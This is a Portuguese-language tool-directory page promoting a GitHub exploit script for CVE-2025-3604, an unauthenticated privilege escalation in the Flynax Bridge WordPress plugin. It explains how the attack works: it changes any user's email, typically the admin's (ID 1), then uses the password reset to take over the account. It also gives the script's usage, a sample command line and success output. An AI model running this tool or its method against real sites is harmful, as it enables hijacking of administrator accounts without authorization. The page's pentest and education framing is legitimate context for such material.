Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-3604 — Flynax Bridge <= 2.2.0 - Escalação de Privilégios Não Autenticada via Assunção de Conta | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-3604
Autenticação e AutorizaçãoEscalada de PrivilégiosAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-3604

CVE-2025-3604

Flynax Bridge <= 2.2.0 - Escalação de Privilégios Não Autenticada via Assunção de Conta

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 Flynax Bridge <= 2.2.0 - Escalação de Privilégios Não Autenticada via Roubo de Conta

📄 Descrição

O plugin Flynax Bridge para WordPress é vulnerável a escalação de privilégios via roubo de conta em todas as versões até, e incluindo, 2.2.0.

Isso se deve ao fato de o plugin não validar corretamente a identidade de um usuário antes de atualizar seus detalhes de conta (como e-mail). Como resultado, atacantes não autenticados podem alterar o endereço de e-mail de qualquer usuário, incluindo administradores, e então iniciar uma redefinição de senha para assumir totalmente a conta.

CVE: CVE-2025-3604
CVSS: 9.8 (Crítico)
Publicado: 23 de abril de 2025
Última Atualização: 24 de abril de 2025


⚙️ Exemplo de Saída do Script

root@kitploit:~
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited

Após a exploração bem-sucedida, o atacante pode ir para a página de login do WordPress e clicar em "Perdeu sua senha?" usando o e-mail recém-definido para redefinir a senha e obter acesso total à conta alvo.


🚀 Uso

root@kitploit:~
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID

WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target URL
  -mail, --newmail NEWMAIL
                          New email to set
  -id, --user_id USER_ID  User ID to exploit

🧪 Exemplo

root@kitploit:~
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"

Explicação:

  • -u: URL base do site WordPress.
  • -id: ID do usuário a ser alvo (geralmente 1 para admin).
  • -mail: Novo e-mail que será definido para esse usuário.

⚠️ Aviso Legal

Use por sua conta e risco. Apenas para testes autorizados e fins educacionais.

🧑‍💻

POR: Nxploited ( Khaled_alenazi )

Baixar ferramenta